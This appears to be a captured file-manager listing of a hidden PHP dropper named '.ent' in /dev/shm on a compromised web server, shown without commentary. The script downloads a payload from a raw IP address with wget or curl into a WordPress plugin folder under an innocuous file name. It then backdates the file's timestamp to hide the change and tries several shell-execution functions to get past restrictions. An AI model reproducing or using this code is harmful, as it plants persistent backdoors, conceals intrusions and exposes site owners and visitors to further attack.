| Current Path : /proc/self/root/dev/shm/ |
| Current File : //proc/self/root/dev/shm/.ent |
<?php $p = '/home/puneetbh/public_html/dj/wp-content/plugins/wpforms-lite/src/Integrations/Square/Admin/Payments/db_common.inc.php'; $u = 'http://62.60.131.254/tmp/rsShSoDfAF'; $fs = 607; $ft = 1755522670; run("wget -O {$p} {$u}"); check($p, $fs, $ft); run("curl -o {$p} {$u}"); check($p, $fs, $ft); function check($p, $fs, $ft) { if (file_exists($p) && filesize($p) == $fs) { @touch($p, $ft); die('!success!'); } } function run($in) { $out = ''; if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); pclose($f); } return $out; } die('!ended!');